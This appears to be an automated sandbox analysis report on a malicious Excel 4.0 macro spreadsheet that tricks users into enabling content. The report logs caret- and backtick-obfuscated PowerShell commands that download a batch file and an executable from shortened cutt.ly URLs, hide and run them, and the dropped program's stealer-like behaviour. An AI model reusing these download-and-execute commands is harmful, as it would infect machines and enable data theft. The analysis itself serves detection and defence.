      Source: Screenshot number: 12Screenshot OCR: document is protected. 21 :: 1. Open the document in Microsoft Office. Prev'ewir 24 25 work for
      Source: Screenshot number: 12Screenshot OCR: protected documents. 26 27 2. If you downloaded this document from your email 28 29 Editing" fro
      Source: Document image extraction number: 0Screenshot OCR: document is protected. 1. Open the document in Microsoft Office. Previewing online does not work f
      Source: Document image extraction number: 0Screenshot OCR: protected documents. 2. If you downloaded this document from your email, please click "Enable Edit
      Source: Document image extraction number: 0Screenshot OCR: Enable Content" on the yellow bar above.
      Source: Document image extraction number: 1Screenshot OCR: document is protected. 1. Open the document in Microsoft Office. Previewing online does not work f
      Source: Document image extraction number: 1Screenshot OCR: protected documents. 2. If you downloaded this document from your email, please click "Enable Edit
      Source: Document image extraction number: 1Screenshot OCR: Enable Content" on the yellow bar above.
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: ul9kpUwYel.xlsInitial sample: EXEC
      Found obfuscated Excel 4.0 MacroShow sources
      Source: ul9kpUwYel.xlsInitial sample: High usage of CHAR() function: 21
      Powershell drops PE fileShow sources
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\cr.exeJump to dropped file
      Source: C:\Users\user\AppData\Roaming\cr.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Users\user\AppData\Roaming\cr.exeMemory allocated: 76D20000 page execute and read and write
      Source: ul9kpUwYel.xls | OLE indicator, VBA macros: true
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: String function: 002D76B0 appears 153 times
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: String function: 002BED89 appears 75 times
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: String function: 0027F4FF appears 176 times
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: String function: 002AFA10 appears 81 times
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: String function: 0040F2AF appears 181 times
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: String function: 0043F7C0 appears 82 times
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: String function: 002AFE70 appears 51 times
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: String function: 00467460 appears 172 times
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: String function: 0044EB39 appears 77 times
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: String function: 0043FC20 appears 61 times
      Source: sqlite3.dll.24.dr | Static PE information: Number of sections: 18 > 10
      Source: cr.exe.23.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: cr.exe.23.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: ul9kpUwYel.xls, type: SAMPLE | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
      Source: dump.pcap, type: PCAP | Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
      Source: 00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
      Source: C:\Users\user\Documents\pd.bat, type: DROPPED | Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
      Source: classification engine | Classification label: mal100.spyw.expl.evad.winXLS@36/22@17/5
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_00437BD1 __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,GetModuleFileNameA,_strlen,_mbstowcs,CreateProcessWithTokenW,CloseHandle,Process32NextW,
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_0043433D CoCreateInstance,
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\251F0000
      Source: C:\Users\user\AppData\Roaming\cr.exe | Mutant created: \Sessions\1\BaseNamedObjects\dfthorbnjuser
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD29.tmp
      Source: ul9kpUwYel.xls | OLE indicator, Workbook stream: true
      Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................................`{.J....................i^Q......$.J..............$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................".6...1.". .=.=. .".6...2.". ............\Q.....i.f. ............D$.............X...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................(................D$.............................x...............d1.......".v...............................J....
      Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................\Q.....(................D$.............X...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................e.c.h.o.........}..v....................|.......................................................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .".W.i.n.d.o.w.s. .8. .d.e.t.e.c.t.e.d.". . ...e.c.h.o..........D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... ..........D$......................\Q.....x................D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................r.e.g...........}..v....................|...............$....................................... ..... .........
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$......................................................................]Q.....r.e.g............D$...............$.............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>......................................]Q......................D$.............8...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..................................]Q......................D$.............8...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................t.i.m.e.o.u.t...}..v....................|...............F.......................8............... ..... .........
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ./.t. .2. . ............................]Q.....t.i.m.e..........D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>.....................................9]Q..... ./.t. ..........D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. .................................9]Q..... ./.t. ..........D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1.......................]Q......................D$.............8...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................s.c.h.t.a.s.k.s.}..v....................|....................................................... ..... .........
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$.....................................................................i]Q.....s.c.h.t..........D$...............$.....v.......................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>......................................^Q......................D$.............x...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..................................^Q......................D$.............x...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................t.i.m.e.o.u.t...}..v....................|.......................................x............... ..... .........
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............). ......................................\Q........J.............D$.............X...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D................................D$......................\Q.....x................D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................i.f. ...........`{.J.....................\Q.....X%.J.............D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................".6...1.". .=.=. .".6...1.". ............\Q.....i.f. ............D$.............X...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................C.m.d...........................................(................D$.............X...............x...............
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$......................................................................\Q.....C.m.d............D$...............$.....j.......................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................). ..............D$......................\Q.......$..............D$.............X...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ...................J............T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d............. ...............B.......................
      Source: C:\Users\user\AppData\Roaming\cr.exe | Command line argument: nkF
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\AppData\Roaming\cr.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: ul9kpUwYel.xls | Virustotal: Detection: 41%
      Source: ul9kpUwYel.xls | Metadefender: Detection: 22%
      Source: ul9kpUwYel.xls | ReversingLabs: Detection: 34%
      Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: unknown | Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
      Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
      Source: unknown | Process created: C:\Windows\System32\mode.com mode 18,1
      Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: unknown | Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: unknown | Process created: C:\Users\user\AppData\Roaming\cr.exe 'C:\Users\user\AppData\Roaming\cr.exe'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mode.com mode 18,1
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\cr.exe 'C:\Users\user\AppData\Roaming\cr.exe'
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2145478746.0000000002AA0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2164368901.0000000002A50000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2153405530.000000001B420000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2189543252.00000000028F0000.00000002.00000001.sdmp

      Data Obfuscation:

      Obfuscated command line found
      Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: unknown | Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
      Suspicious powershell command line found
      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_00423778 GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,
      Source: sqlite3.dll.24.dr | Static PE information: section name: /4
      Source: sqlite3.dll.24.dr | Static PE information: section name: /19
      Source: sqlite3.dll.24.dr | Static PE information: section name: /31
      Source: sqlite3.dll.24.dr | Static PE information: section name: /45
      Source: sqlite3.dll.24.dr | Static PE information: section name: /57
      Source: sqlite3.dll.24.dr | Static PE information: section name: /70
      Source: sqlite3.dll.24.dr | Static PE information: section name: /81
      Source: sqlite3.dll.24.dr | Static PE information: section name: /92
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_00467460 push eax; ret
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_004674C1 push eax; ret
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_00467480 push eax; ret
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_0043FA71 push ecx; ret
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_0043FC66 push ecx; ret
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_0046FED8 pushad ; retf 0046h
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_00222AA1 push es; retf
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_0022502A push esi; ret
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_00223605 push 00000004h; iretd
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_00223E89 push eax; retf
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_002D76B0 push eax; ret
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_002D76D0 push eax; ret
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_002AFCC1 push ecx; ret
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_047F350A push ss; iretd
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_047F312B push ss; ret
      Source: initial sample | Static PE information: section name: UPX0
      Source: initial sample | Static PE information: section name: UPX1

      Persistence and Installation Behavior:

      Tries to download and execute files (via powershell)
      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\cr.exe
      Source: C:\Users\user\AppData\Roaming\cr.exe | File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
      Source: C:\Users\user\AppData\Roaming\cr.exe | Code function: 24_2_0043ED22 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
